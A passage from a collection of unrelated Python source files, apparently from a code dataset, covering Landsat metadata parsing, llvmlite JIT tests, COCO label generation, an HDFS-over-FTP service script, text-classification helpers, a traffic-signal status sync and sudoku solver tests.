        else:
            return None

    @property
    def sr_transform(self) -> List[float]:
        # Affine transform (GDAL-style, 6 values) for reflective assets.
        return transform_from_bbox(self.proj_bbox, self.sr_shape)

    @property
    def thermal_transform(self) -> Optional[List[float]]:
        # None when the product carries no thermal bands.
        return map_opt(
            lambda shape: transform_from_bbox(self.proj_bbox, shape),
            self.thermal_shape)

    @property
    def sr_gsd(self) -> float:
        # Ground sample distance (metres) of the reflective bands.
        return self._get_float(
            "LEVEL1_PROJECTION_PARAMETERS/GRID_CELL_SIZE_REFLECTIVE")

    @property
    def thermal_gsd(self) -> Optional[float]:
        return map_opt(
            float,
            self._root.find_text(
                'LEVEL1_PROJECTION_PARAMETERS/GRID_CELL_SIZE_THERMAL'))

    @property
    def scene_datetime(self) -> datetime:
        # Combine the acquisition date and scene-center time fields.
        date = self._get_text("IMAGE_ATTRIBUTES/DATE_ACQUIRED")
        time = self._get_text("IMAGE_ATTRIBUTES/SCENE_CENTER_TIME")
        return str_to_datetime(f"{date} {time}")

    @property
    def cloud_cover(self) -> float:
        return self._get_float("IMAGE_ATTRIBUTES/CLOUD_COVER")

    @property
    def sun_azimuth(self) -> float:
        """Returns the sun azimuth in STAC form.
        Converts from Landsat metadata form (-180 to 180 from north, west being
        negative) to STAC form (0 to 360 clockwise from north).
        Returns:
            float: Sun azimuth, 0 to 360 clockwise from north.
        """
        azimuth = self._get_float("IMAGE_ATTRIBUTES/SUN_AZIMUTH")
        if azimuth < 0.0:
            azimuth += 360
        return azimuth

    @property
    def sun_elevation(self) -> float:
        return self._get_float("IMAGE_ATTRIBUTES/SUN_ELEVATION")

    @property
    def off_nadir(self) -> Optional[float]:
        if self.satellite_num == 8 and self.legacy_l8:
            # Keep current STAC Item content consistent for Landsat 8
            if self._get_text("IMAGE_ATTRIBUTES/NADIR_OFFNADIR") == "NADIR":
                return 0
            else:
                return None
        else:
            # NADIR_OFFNADIR and ROLL_ANGLE xml entries do not exist prior to
            # landsat 8. Therefore, we perform a soft check for NADIR_OFFNADIR.
            # If exists and is equal to "OFFNADIR", then a non-zero ROLL_ANGLE
            # exists. We force this ROLL_ANGLE to be positive to conform with
            # the stac View Geometry extension. We return 0 otherwise since
            # off-nadir views are only an option on Landsat 8-9.
            if self._root.find_text(
                    "IMAGE_ATTRIBUTES/NADIR_OFFNADIR") == "OFFNADIR":
                return abs(self._get_float("IMAGE_ATTRIBUTES/ROLL_ANGLE"))
            else:
                return 0

    @property
    def wrs_path(self) -> str:
        # Zero-padded to 3 digits to match the conventional PPP format.
        return self._get_text("IMAGE_ATTRIBUTES/WRS_PATH").zfill(3)

    @property
    def wrs_row(self) -> str:
        return self._get_text("IMAGE_ATTRIBUTES/WRS_ROW").zfill(3)

    @property
    def landsat_metadata(self) -> Dict[str, Any]:
        # Properties for the STAC "landsat" extension.
        landsat_meta = {
            "landsat:cloud_cover_land":
            self._get_float("IMAGE_ATTRIBUTES/CLOUD_COVER_LAND"),
            "landsat:wrs_type":
            self._get_text("IMAGE_ATTRIBUTES/WRS_TYPE"),
            "landsat:wrs_path":
            self.wrs_path,
            "landsat:wrs_row":
            self.wrs_row,
            "landsat:collection_category":
            self._get_text("PRODUCT_CONTENTS/COLLECTION_CATEGORY"),
            "landsat:collection_number":
            self._get_text("PRODUCT_CONTENTS/COLLECTION_NUMBER"),
            "landsat:correction":
            self.processing_level,
            "landsat:scene_id":
            self.scene_id
        }
        if self.satellite_num == 8 and self.legacy_l8:
            # Landsat 8 items historically used "landsat:processing_level".
            landsat_meta["landsat:processing_level"] = landsat_meta.pop(
                "landsat:correction")
        return landsat_meta

    @property
    def level1_radiance(self) -> Dict[str, Any]:
        """Gets the scale (mult) and offset (add) values for generating TOA
        radiance from Level-1 DNs.
        This is relevant to MSS data, which is only processed to Level-1.
        Returns:
            Dict[str, Any]: Dict of scale and offset dicts, keyed by band
            number.
        """
        node = self._root.find_or_throw("LEVEL1_RADIOMETRIC_RESCALING",
                                        self._xml_error)
        mult_add: Dict[str, Any] = defaultdict(dict)
        for item in node.element:
            if item.tag.startswith("RADIANCE_MULT_BAND"):
                band = f'B{item.tag.split("_")[-1]}'
                mult_add[band]["mult"] = float(str(item.text))
            elif item.tag.startswith("RADIANCE_ADD_BAND"):
                band = f'B{item.tag.split("_")[-1]}'
                mult_add[band]["add"] = float(str(item.text))
        return mult_add

    @classmethod
    def from_file(cls,
                  href: str,
                  read_href_modifier: Optional[ReadHrefModifier] = None,
                  legacy_l8: bool = True) -> "MtlMetadata":
        # Alternate constructor: parse the MTL XML straight from an href.
        return cls(XmlElement.from_file(href, read_href_modifier),
                   href=href,
                   legacy_l8=legacy_l8)
| StarcoderdataPython |
import os
import sys

# Make the repository root importable when this file is run from its own
# directory (so the twircbot package resolves without installation).
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))

# NOTE(review): star imports re-export everything from the package modules;
# acceptable for an interactive/test shim, but avoid in library code.
from twircbot.twircbot import *
from twircbot.botmodule import *
from twircbot.logger import *
from twircbot.twitchtools import *
| StarcoderdataPython |
1924027 | <gh_stars>0
""" Оповещение администратора о возникших ошибках """
from traceback import format_exception, format_exc
from contextlib import contextmanager
from lib.config import emergency_id
from lib.commands import vk, api
from logging import getLogger
logger = getLogger("GM.lib.errors")
@contextmanager
def ErrorManager(name):
    """Simplified error reporting context manager.

    str name: name of the script (usually shortened)
    Usage: with ErrorManager(name): main()
    """
    try:
        yield
    except Exception as e:
        # Log the full traceback, notify the admin, then re-raise so the
        # caller still sees the failure.
        logger.exception("Exception occured, exiting...")
        sendErrorMessage(name)
        raise e
def sendErrorMessage(name, exception=None):
    """Send an error report to the admin: uses either the given exception
    or the one currently being handled."""
    logger.debug("Sending error message...")
    exception = format_error(exception)
    message = "{}:\n{}".format(name, exception)
    # Deliver via the VK messages API to the configured emergency user.
    vk(api.messages.send, user_id=emergency_id, message=message)
def format_error(error):
    """Render *error* as a full traceback string; when error is None,
    format the exception currently being handled instead."""
    if error is None:
        return format_exc()
    parts = format_exception(type(error), error, error.__traceback__)
    return "".join(parts)
| StarcoderdataPython |
223604 | <reponame>AnttiHaerkoenen/grand_duchy
import os
import subprocess
def remove_whitespaces(directory):
    """Recursively rename every file and directory under *directory*,
    replacing spaces in names with underscores.

    Fixes over the original implementation:
    * a renamed directory is now recursed into under its NEW name — the
      old code checked ``os.path.isdir`` on the pre-rename name, so any
      directory containing a space was never descended into;
    * uses ``os.rename`` instead of spawning ``mv`` via subprocess;
    * does not change (and leak) the process working directory.
    """
    directory = os.path.expandvars(os.path.expanduser(directory))
    for entry in os.listdir(directory):
        path = os.path.join(directory, entry)
        if " " in entry:
            renamed = os.path.join(directory, entry.replace(" ", "_"))
            os.rename(path, renamed)
            path = renamed
        if os.path.isdir(path):
            remove_whitespaces(path)
if __name__ == '__main__':
    # NOTE(review): runs against a hard-coded personal directory; the
    # renames are destructive and not easily reversible.
    remove_whitespaces('~/sanomalehdet')
| StarcoderdataPython |
86646 | <filename>tests/llvm/test_llvm_lite.py
#!/bin/env python3
# Short example/demonstrator how to create and compile native code using
# LLVM MCJIT just-in-time compiler
from llvmlite import binding,ir
import ctypes
import pytest
try:
import pycuda
from pycuda import autoinit as pycuda_default
# Import this after pycuda since only cuda test needs numpy
import numpy as np
except:
pycuda = None
@pytest.mark.llvm
def test_llvm_lite():
    """Build a double-add function in LLVM IR, JIT-compile it with MCJIT
    on the host CPU and run it through ctypes."""
    # Create some useful types
    double = ir.DoubleType()
    fnty = ir.FunctionType(double, (double, double))
    # Create an empty module...
    module = ir.Module(name=__file__)
    # and declare a function named "fpadd" inside it
    func = ir.Function(module, fnty, name="fpadd")
    # Now implement basic addition
    # basic blocks are sequences of instructions that have exactly one
    # entry point and one exit point (no control flow)
    # We only need one in this case
    # See available operations at:
    # http://llvmlite.readthedocs.io/en/latest/ir/builder.html#instruction-building
    block = func.append_basic_block(name="entry")
    builder = ir.IRBuilder(block)
    a, b = func.args
    result = builder.fadd(a, b, name="res")
    builder.ret(result)
    # Uncomment to print the module IR. This prints LLVM IR assembly.
    # print("LLVM IR:")
    # print(module)
    binding.initialize()
    # native == currently running CPU
    binding.initialize_native_target()
    # TODO: This prevents 'LLVM ERROR: Target does not support MC emission!',
    # but why?
    binding.initialize_native_asmprinter()
    # Create compilation target, use default triple
    target = binding.Target.from_default_triple()
    target_machine = target.create_target_machine()
    # And an execution engine with an empty backing module
    # TODO: why is empty backing mod necessary?
    backing_mod = binding.parse_assembly("")
    # There are other engines beside MCJIT
    # MCJIT makes it easier to run the compiled function right away.
    engine = binding.create_mcjit_compiler(backing_mod, target_machine)
    # IR module is not the same as binding module.
    # "assembly" in this case is LLVM IR assembly
    # TODO is there a better way to convert this?
    mod = binding.parse_assembly(str(module))
    mod.verify()
    # Now add the module and make sure it is ready for execution
    engine.add_module(mod)
    engine.finalize_object()
    # Uncomment to print generated x86 assembly
    #print("x86 assembly:")
    #print(target_machine.emit_assembly(mod))
    # Look up the function pointer (a Python int)
    # func_ptr is now an address to a compiled function
    func_ptr = engine.get_function_address("fpadd")
    # Run the function via ctypes
    a = 10.0
    b = 3.5
    cfunc = ctypes.CFUNCTYPE(ctypes.c_double, ctypes.c_double, ctypes.c_double)(func_ptr)
    res = cfunc(10.0, 3.5)
    assert res == (a + b)
    # NOTE(review): the assert above raises on mismatch, so the
    # "TEST FAILED" branch below can never be reached.
    if res != (a + b):
        print("TEST FAILED! {} instead of {}".format(res, a + b))
    else:
        print("TEST PASSED! {} == {}".format(res, a + b))
    engine.remove_module(mod)
    # TODO: shutdown cleanly
    # we need to do something extra before shutdown
    #binding.shutdown()
@pytest.mark.llvm
@pytest.mark.cuda
@pytest.mark.skipif(pycuda is None, reason="pyCUDA module is not available")
def test_llvm_lite_ptx_pycuda():
    """Build a CUDA kernel in LLVM IR, compile it to PTX for the local
    device's compute capability and launch it through pyCUDA."""
    # Create some useful types
    double = ir.DoubleType()
    fnty = ir.FunctionType(ir.VoidType(), (double, double, double.as_pointer()))
    # Create an empty module...
    module = ir.Module(name=__file__)
    # and declare a function named "fpadd" inside it
    func = ir.Function(module, fnty, name="fpadd")
    # Now implement basic addition
    # basic blocks are sequences of instructions that have exactly one
    # entry point and one exit point (no control flow)
    # We only need one in this case
    # See available operations at:
    # http://llvmlite.readthedocs.io/en/latest/ir/builder.html#instruction-building
    block = func.append_basic_block(name="entry")
    builder = ir.IRBuilder(block)
    a, b, res = func.args
    result = builder.fadd(a, b, name="res")
    # Kernels return void; the sum is written through the pointer arg.
    builder.store(result, res)
    builder.ret_void()
    # Add kernel mark metadata
    module.add_named_metadata("nvvm.annotations",[func, "kernel", ir.IntType(32)(1)])
    # Uncomment to print the module IR. This prints LLVM IR assembly.
    # print("LLVM IR:\n", module)
    binding.initialize()
    binding.initialize_all_targets()
    binding.initialize_all_asmprinters()
    capability = pycuda_default.device.compute_capability()
    # Create compilation target, use default triple
    target = binding.Target.from_triple("nvptx64-nvidia-cuda")
    target_machine = target.create_target_machine(cpu="sm_{}{}".format(capability[0], capability[1]), codemodel='small')
    mod = binding.parse_assembly(str(module))
    mod.verify()
    ptx = target_machine.emit_assembly(mod)
    # Uncomment to print generated x86 assembly
    # print("PTX assembly:\n", ptx)
    ptx_mod = pycuda.driver.module_from_buffer(ptx.encode())
    cuda_func = ptx_mod.get_function('fpadd')
    # Run the function via ctypes
    a = np.float64(10.0)
    b = np.float64(3.5)
    res = np.empty(1, dtype=np.float64)
    dev_res = pycuda.driver.Out(res)
    # Single-thread launch is enough for a scalar add.
    cuda_func(a, b, dev_res, block=(1,1,1))
    assert res[0] == (a + b)
3302350 | <filename>scripts/coco_label.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import json
import os
def main(opt):
    """Build a multi-hot category label matrix for the COCO dataset.

    Reads the train/val instance annotations plus dataset_coco.json (which
    maps Karpathy-split image ids to COCO ids) and writes an
    (123287, 80) float32 matrix ``labels.npy`` to opt.output, where row i
    holds the multi-hot category labels of the image with imgid == i.

    opt must provide: train, val, dataset (input JSON paths) and
    output (directory to save labels.npy in).
    """
    with open(opt.train, 'r') as f:
        train_data = json.load(f)
    with open(opt.val, 'r') as f:
        val_data = json.load(f)
    with open(opt.dataset, 'r') as f:
        data = json.load(f)

    # Karpathy imgid -> COCO image id
    trans = {info['imgid']: info['cocoid'] for info in data['images']}

    # COCO category id -> dense label index 0..79
    cate_map = {cate['id']: i
                for i, cate in enumerate(train_data['categories'])}

    # COCO image id -> list of dense label indices.
    # BUGFIX: the original's if/else-append pattern dropped the FIRST
    # annotation of every image (the else branch created an empty list
    # without appending the category).
    label = {}
    for info in train_data['annotations']:
        label.setdefault(info['image_id'], []).append(
            cate_map[info['category_id']])
    for info in val_data['annotations']:
        label.setdefault(info['image_id'], []).append(
            cate_map[info['category_id']])
    for k, v in label.items():
        label[k] = list(set(v))

    # 123287 images in the Karpathy COCO split; 80 COCO categories.
    all_label = np.zeros([123287, 80], dtype=np.float32)
    for i in range(len(all_label)):
        try:
            all_label[i, label[trans[i]]] = 1.
        except KeyError:
            # imgid missing from dataset_coco.json, or image has no
            # annotations: leave the row all-zero.  (The original bare
            # ``except`` also hid genuine errors.)
            pass
    np.save(os.path.join(opt.output, 'labels.npy'), all_label)
if __name__ == "__main__":
    # CLI entry point: all four paths are required for a meaningful run.
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--train', type=str, help='Path to instances_train2014.json')
    parser.add_argument('--val', type=str, help='Path to instances_val2014.json')
    parser.add_argument('--dataset', type=str, help='Path to dataset_coco.json')
    parser.add_argument('--output', type=str, help='Folder to save label file')
    opt = parser.parse_args()
    main(opt)
| StarcoderdataPython |
1817973 | <filename>7kyu/youre_a_square.py
# http://www.codewars.com/kata/54c27a33fb7da0db0100040e/
def is_square(n):
    """Return True if n is a perfect square (n == k*k for some integer k).

    Uses math.isqrt for exact integer arithmetic: the original
    ``(n ** 0.5).is_integer()`` breaks for large n, where the float square
    root rounds to a whole number even for non-squares.  0 counts as a
    square (0 * 0), per the kata this solves.
    """
    import math
    return n >= 0 and math.isqrt(n) ** 2 == n
| StarcoderdataPython |
6604999 | <gh_stars>1-10
import pytest
from .day_9 import parse_input, get_non_composable, get_key
@pytest.fixture()
def example_input():
    # Worked example from the Advent of Code day 9 puzzle statement
    # (preamble length 5).
    return parse_input(
        """35
20
15
25
47
40
62
55
65
95
102
117
150
182
127
219
299
277
309
576"""
    )
@pytest.fixture()
def puzzle_input():
    # Full personal puzzle input, stored outside the package directory.
    with open("../inputs/day_9.txt", "r") as f:
        return parse_input(f.read())
def test_example_part_1(example_input):
    # Part 1 on the worked example: first value that is not a sum of two
    # of the preceding 5 numbers.
    assert get_non_composable(example_input, 5) == 127
def test_input_part_1(puzzle_input):
    # Regression check against the accepted part-1 answer (preamble 25).
    assert get_non_composable(puzzle_input, 25) == 1930745883
def test_example_part_2(example_input):
    # Part 2 on the worked example.
    assert get_key(example_input, 5) == 62
def test_input_part_2(puzzle_input):
    # Regression check against the accepted part-2 answer.
    assert get_key(puzzle_input, 25) == 268878261
| StarcoderdataPython |
63294 | <reponame>jpbelleau/hdfs-over-ftp-slider
#!/usr/bin/env python
import sys
from resource_management import *
class HDFSFTP(Script):
    """Slider lifecycle script for the hdfs-over-ftp application package.

    NOTE: Python 2 code (octal literals like 0666 are invalid in Python 3).
    """

    def install(self, env):
        # Install the packages declared in the app package metadata.
        self.install_packages(env)

    def configure(self, env):
        import os
        import params
        env.set_params(params)
        keystore_path = params.app_root + "/" + params.keystore_file
        # Pre-create a world-writable log file for the FTP server.
        File(format("{params.log_dir}/hdfs-over-ftp.log"),
             mode=0666,
             owner=params.app_user,
             group=params.user_group
             )
        TemplateConfig(format("{app_root}/log4j.xml"), owner = params.app_user, group = params.user_group)
        #TemplateConfig(format("{app_root}/hdfs-over-ftp.properties"), owner = params.app_user, group = params.user_group)
        # Render server and user configuration from the Slider config tree.
        PropertiesFile(format("{app_root}/hdfs-over-ftp.properties"),
                       properties = params.config['configurations']['hdfsftp'],
                       owner = params.app_user,
                       group = params.user_group
                       )
        PropertiesFile(format("{app_root}/users.properties"),
                       properties = params.config['configurations']['usersprops'],
                       owner = params.app_user,
                       group = params.user_group
                       )
        # Fetch the SSL keystore from HDFS the first time only.
        if not os.path.exists(keystore_path):
            Execute(format("{hdfs_bin} dfs -get {keystore_in_hdfs} {keystore_path}"),
                    user=params.app_user)
            File(keystore_path,
                 mode=0600,
                 # NOTE(review): group/owner values look swapped compared
                 # with the resources above — confirm intent.
                 group=params.app_user,
                 owner=params.user_group,
                 replace=False)

    def start(self, env):
        import params
        env.set_params(params)
        self.configure(env)
        # Launch the FTP server as a background JVM, recording its pid.
        process_cmd = format("{java64_home}/jre/bin/java {params.java_opts} -Dcom.sun.management.jmxremote.port={params.jmxport} -Dcom.sun.management.jmxremote.rmi.port={params.jmxport} -cp {params.app_root}/:{params.app_root}/lib/* org.apache.hadoop.contrib.ftp.HdfsOverFtpServer --approot {params.app_root} > {params.log_dir}/hdfsftp-output.log 2>&1")
        #user=params.app_user,
        Execute(process_cmd,
                logoutput=True,
                wait_for_finish=False,
                pid_file=params.pid_file
                )

    def stop(self, env):
        import params
        env.set_params(params)
        # NOTE(review): no kill/stop action is issued here; the process is
        # presumably terminated externally by Slider — confirm.

    def status(self, env):
        import params
        env.set_params(params)
        # Raises if the pid-file process is no longer running.
        check_process_status(params.pid_file)
if __name__ == "__main__":
    # Entry point invoked by the Slider agent with the lifecycle command.
    HDFSFTP().execute()
| StarcoderdataPython |
3465456 | <gh_stars>1-10
#!/usr/bin/python3
'''
Convert Gend scores
from the PYM dataset to values between -1(most masculine)
and +1 (most feminine)
'''
import re
# Matches a plain non-negative decimal number such as "7" or "3.25".
# FIX: raw string — "\d" inside a plain literal is an invalid escape
# sequence (DeprecationWarning today, an error in future Pythons).
num_re = re.compile(r"^\d+(\.\d+)?$")

with open("pym_data.txt", "r") as pym_data_f:
    for line in pym_data_f:
        parameters = line.strip().split()
        # A valid data row has exactly 35 whitespace-separated fields;
        # field 2 is the word and field 32 the raw Gend score.
        if len(parameters) == 35:
            word = parameters[2]
            gend = parameters[32]
            if re.match(num_re, gend):
                # Rescale so 4.05 maps to 0; per the header comment the
                # result runs from -1 (most masculine) to +1 (most
                # feminine) — presumably the raw scale tops out at 8.1.
                new_score = (float(gend) - 4.05) / 4.05
                print(word + "," + str(new_score))
| StarcoderdataPython |
1798324 | <filename>Short Text Classification/Text_Classification/data_helpers.py
# encoding: UTF-8
import numpy as np
import re
import itertools
from collections import Counter
import os
import word2vec_helpers
import time
import pickle
def load_data_and_labels(input_text_file, input_label_file, num_labels):
    # Load cleaned Chinese text plus integer labels (one label per line).
    # num_labels is currently unused.
    x_text = read_and_clean_zh_file(input_text_file)
    # NOTE(review): under Python 3 ``map`` returns a lazy iterator, not a
    # list; callers expecting a list should wrap it.  The file handle is
    # also never closed explicitly.
    y = None if not os.path.exists(input_label_file) else map(int, list(open(input_label_file, "r").readlines()))
    return (x_text, y)
def load_positive_negative_data_files(positive_data_file, negative_data_file, video_data_file):
    """
    Loads the class corpora, splits the data into words and generates
    one-hot labels.
    Returns split sentences and labels.
    """
    # NOTE(review): despite the positive/negative naming (inherited from
    # the MR polarity example), this loads THREE classes: cooking, music
    # and video.
    # Load data from files
    cooking_examples = read_and_clean_zh_file(positive_data_file)
    music_examples = read_and_clean_zh_file(negative_data_file)
    video_examples = read_and_clean_zh_file(video_data_file)
    # Combine data
    x_text = cooking_examples + music_examples + video_examples
    # Generate one-hot labels: cooking=[0,0,1], music=[0,1,0], video=[1,0,0]
    cooking_labels = [[0, 0, 1] for _ in cooking_examples]
    music_labels = [[0, 1, 0] for _ in music_examples]
    video_labels = [[1, 0, 0] for _ in video_examples]
    y = np.concatenate([cooking_labels, music_labels, video_labels], 0)
    return [x_text, y]
def padding_sentences(input_sentences, padding_token, padding_sentence_length=None):
    """Split each sentence on spaces and pad/truncate every token list to a
    common length.

    Returns (padded_token_lists, sentence_length), where sentence_length is
    padding_sentence_length when given, else the longest sentence's length.
    """
    tokenized = [s.split(' ') for s in input_sentences]
    if padding_sentence_length is not None:
        target_len = padding_sentence_length
    else:
        target_len = max(len(tokens) for tokens in tokenized)
    padded = []
    for tokens in tokenized:
        if len(tokens) > target_len:
            padded.append(tokens[:target_len])
        else:
            padded.append(tokens + [padding_token] * (target_len - len(tokens)))
    return (padded, target_len)
def batch_iter(data, batch_size, num_epochs, shuffle=True):
    """Yield successive mini-batches over *data* for *num_epochs* epochs.

    When shuffle is True the order is re-permuted at the start of every
    epoch.  The final batch of an epoch may be smaller than batch_size.
    """
    data = np.array(data)
    n = len(data)
    batches_per_epoch = int((n - 1) / batch_size) + 1
    for _ in range(num_epochs):
        if shuffle:
            order = np.random.permutation(np.arange(n))
            epoch_data = data[order]
        else:
            epoch_data = data
        for b in range(batches_per_epoch):
            lo = b * batch_size
            hi = min(lo + batch_size, n)
            yield epoch_data[lo:hi]
def test():
    # Ad-hoc manual smoke test; the real checks are commented out.
    # Test clean_str
    print("Test")
    # print(clean_str("This's a huge dog! Who're going to the top."))
    # Test load_positive_negative_data_files
    # x_text,y = load_positive_negative_data_files("./tiny_data/rt-polarity.pos", "./tiny_data/rt-polarity.neg")
    # print(x_text)
    # print(y)
    # Test batch_iter
    # batches = batch_iter(x_text, 2, 4)
    # for batch in batches:
    #     print(batch)
def mkdir_if_not_exist(dirpath):
    """Create *dirpath* if it does not exist yet.

    Uses EAFP instead of the original exists()-then-mkdir check, which was
    racy: another process could create the directory between the two calls.
    (Python 3: FileExistsError.)
    """
    try:
        os.mkdir(dirpath)
    except FileExistsError:
        pass
def seperate_line(line):
    """Insert a space after every character ("ab" -> "a b ").

    Note the trailing space; clean_str later squeezes the whitespace.
    """
    return "".join(ch + " " for ch in line)
def read_and_clean_zh_file(input_file, output_cleaned_file=None):
    """Read a UTF-8 text file and return its lines cleaned for Chinese
    text processing (one space between characters, non-CJK stripped).

    If output_cleaned_file is given, the cleaned lines are also written
    there, UTF-8 encoded.
    """
    with open(input_file, "rb") as f:
        lines = [clean_str(seperate_line(raw.decode('utf-8'))) for raw in f]
    if output_cleaned_file is not None:
        # BUGFIX: the original opened this file in text mode yet wrote
        # encoded bytes, which raises TypeError on Python 3; it also never
        # closed either file handle.
        with open(output_cleaned_file, 'w', encoding='utf-8') as f:
            for line in lines:
                f.write(line + '\n')
    return lines
def clean_str(string):
    """Keep only CJK ideographs (U+4E00..U+9FFF); everything else becomes a
    space, runs of whitespace are collapsed, and the result is stripped."""
    cleaned = re.sub(r"[^\u4e00-\u9fff]", " ", string)
    cleaned = re.sub(r"\s{2,}", " ", cleaned)
    return cleaned.strip()
def saveDict(input_dict, output_file):
    """Pickle *input_dict* into *output_file* (binary mode)."""
    with open(output_file, 'wb') as handle:
        pickle.dump(input_dict, handle)
def loadDict(dict_file):
    """Unpickle and return the object stored in *dict_file*."""
    with open(dict_file, 'rb') as handle:
        return pickle.load(handle)
| StarcoderdataPython |
4838183 | <gh_stars>1-10
# Attributes:
# FLASH_STATUSES (list): Description
# SOCR_SIG_RES_ID (str): Description
# SOCR_SIG_STAT_RES_ID (str): Description
import os
import pdb
import sys
import arrow
import kitsutil
import datautil
import emailutil
import jobutil
import logutil
import socratautil
import _setpath
from config.knack.config import cfg
from config.secrets import *
# define config variables
SOCR_SIG_RES_ID = "xwqn-2f78"  # Socrata resource ID: traffic signal inventory dataset
SOCR_SIG_STAT_RES_ID = "5zpr-dehc"  # Socrata resource ID: signal status dataset
FLASH_STATUSES = ["1", "2", "3"]  # KITS OPERATION_STATE values treated as "in flash"
def add_ids(records, primary_key="signal_id", id_field="record_id"):
    """Assign each record a unique ID: "<primary key>_<current timestamp>".

    Records that already carry a truthy *id_field* value are left untouched.
    The records are mutated in place and also returned.

    Bug fix: the *id_field* parameter was previously ignored — the function
    always read and wrote the hardcoded key "record_id". It now honors the
    parameter (default unchanged, so existing callers behave the same).

    Args:
        records (list[dict]): records to stamp.
        primary_key (str): key whose value prefixes the generated ID.
        id_field (str): key under which the generated ID is stored.

    Returns:
        list[dict]: the same list, with IDs filled in.
    """
    now = arrow.now().timestamp
    for record in records:
        if not record.get(id_field):
            record[id_field] = "{}_{}".format(record[primary_key], now)
    return records
def add_timestamps(records, timestamp_field="processed_datetime"):
    """Stamp every record with the current Unix timestamp (mutates in place).

    Args:
        records (list[dict]): records to stamp.
        timestamp_field (str): key under which the timestamp is stored.

    Returns:
        list[dict]: the same list, with timestamps added.
    """
    now = arrow.now().timestamp
    for record in records:
        record[timestamp_field] = now
    return records
def main():
    """Sync KITS signal flash statuses into the Socrata signal-status dataset.

    Fetches the signal inventory and the current status dataset from Socrata,
    queries KITS for live operation states, detects changed/new/deleted
    status records, and upserts the delta back to Socrata.

    Returns:
        int: number of records sent to Socrata (0 when nothing changed).
    """
    # get current traffic signal data from Socrata
    socr = socratautil.Soda(resource=SOCR_SIG_RES_ID)
    signal_data = socr.data
    kits_query = kitsutil.status_query()
    kits_data = kitsutil.data_as_dict(KITS_CREDENTIALS, kits_query)
    kits_data = datautil.replace_timezone(kits_data, ["OPERATION_STATE_DATETIME"])
    kits_data = datautil.stringify_key_values(kits_data)
    # verify the KITS data is current
    # sometimes the signal status service goes down
    # in which case contact ATMS support
    # NOTE(review): `stale` is never checked afterwards — presumably
    # check_for_stale alerts/raises internally; confirm.
    stale = kitsutil.check_for_stale(kits_data, "OPERATION_STATE_DATETIME")
    # filter KITS data for statuses of concern
    kits_data = datautil.filter_by_val(kits_data, "OPERATION_STATE", FLASH_STATUSES)
    # append kits data to signal data
    if kits_data:
        new_data = datautil.lower_case_keys(kits_data)
        new_data = datautil.merge_dicts(
            signal_data,
            new_data,
            "signal_id",
            ["operation_state_datetime", "operation_state", "plan_id"],
        )
        new_data = datautil.stringify_key_values(new_data)
    else:
        new_data = []
    # get current signal status DATASET and metadata from socrata
    sig_status = socratautil.Soda(resource=SOCR_SIG_STAT_RES_ID)
    # add special socrata deleted field
    # required for sending delete requests to socrata
    fieldnames = sig_status.fieldnames + [":deleted"]
    # transform signal status socrata data for comparison
    # with "new" data from kits
    sig_status_data = datautil.reduce_to_keys(sig_status.data, fieldnames)
    date_fields = sig_status.date_fields
    sig_status_data = socratautil.strip_geocoding(sig_status_data)
    sig_status_data = datautil.stringify_key_values(sig_status_data)
    # identify signals whose status (OPERATION_STATE) has changed
    cd_results = datautil.detect_changes(
        sig_status_data,
        new_data,
        "signal_id",
        # only a change in operation state
        # triggers an update to socrata DATASET
        keys=["operation_state"],
    )
    if cd_results["new"] or cd_results["change"] or cd_results["delete"]:
        # build one payload of adds + changes (timestamped) + deletes
        adds = add_ids(cd_results["new"])
        deletes = socratautil.prepare_deletes(cd_results["delete"], "signal_id")
        payload = adds + cd_results["change"]
        payload = add_timestamps(payload)
        payload = payload + deletes
        payload = datautil.reduce_to_keys(payload, fieldnames)
        results = socratautil.Soda(
            auth=SOCRATA_CREDENTIALS,
            records=payload,
            resource=SOCR_SIG_STAT_RES_ID,
            date_fields=None,
            lat_field="location_latitude",
            lon_field="location_longitude",
            location_field="location",
            replace=False,
            source="kits"
        )
        return len(payload)
    else:
        return 0
# Script entry point.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
4847767 | import os
# Local directory of CypherCat API
# NOTE(review): "CypherCat API" looks copied from another project; the value
# is simply this module's directory. Confirm and reword.
VARGAN_DIR = os.path.dirname(os.path.abspath(__file__))

# Local directory containing entire repo
REPO_DIR = os.path.split(VARGAN_DIR)[0]

# Local directory for datasets
DATASETS_DIR = os.path.join(REPO_DIR, 'datasets')

# Local directory for runs
RUNS_DIR = os.path.join(REPO_DIR, 'runs')
| StarcoderdataPython |
3265026 | __author__ = '<NAME> <<EMAIL>>'
import unittest
from sudoku import solver
import time
class TestSudoku(unittest.TestCase):
    """Exercises solver.Sudoku on puzzles of varying difficulty.

    Bug fix: time.clock() was removed in Python 3.8; timing now uses
    time.perf_counter(), the documented replacement for measuring
    wall-clock intervals.
    """

    def setUp(self):
        """Build a fresh solver and a library of puzzles; pick one to run."""
        self.sudoku = solver.Sudoku(max_iterations=1000, debug_print=False)
        easy = ('830076042'
                '600300097'
                '000082100'
                '090030005'
                '026000730'
                '300020010'
                '003460000'
                '170003006'
                '260790054')
        medium = ('050000006'
                  '480090003'
                  '903800000'
                  '017004000'
                  '600172005'
                  '000500810'
                  '000003508'
                  '700050041'
                  '800000090')
        hard = ('003105060'
                '000004008'
                '060000507'
                '056000000'
                '094602150'
                '000000620'
                '509000040'
                '600400000'
                '040203900')
        evil = ('005090400'
                '700046000'
                '000300090'
                '600000020'
                '090158030'
                '080000009'
                '060005000'
                '000920001'
                '008010900')
        # complete
        done = ('391286574'
                '487359126'
                '652714839'
                '875431692'
                '213967485'
                '964528713'
                '149673258'
                '538142967'
                '726895341')
        # supposedly the world's hardest?
        everest = ('800000000'
                   '003600000'
                   '070090200'
                   '050007000'
                   '000045700'
                   '000100030'
                   '001000068'
                   '008500010'
                   '090000400')
        self.puzzle = evil  # choose puzzle

    def test_solve(self):
        """The chosen puzzle parses and solves within the iteration budget."""
        self.assertTrue(self.sudoku.get_input(self.puzzle))
        self.assertTrue(self.sudoku.solve())
        print('done in', self.sudoku.current)

    def test_efficiency(self):
        """Solve the same puzzle repeatedly; report iteration/time statistics."""
        iterations, times = [], []
        validity = 100
        for i in range(validity):
            if self.sudoku.get_input(self.puzzle):
                # perf_counter() replaces the removed time.clock().
                start = time.perf_counter()
                self.assertTrue(self.sudoku.solve())
                end = time.perf_counter()
                times.append(end - start)
                progress = i / (validity / 100)
                if progress % 10.0 == 0.0:
                    print(str(progress) + "%")
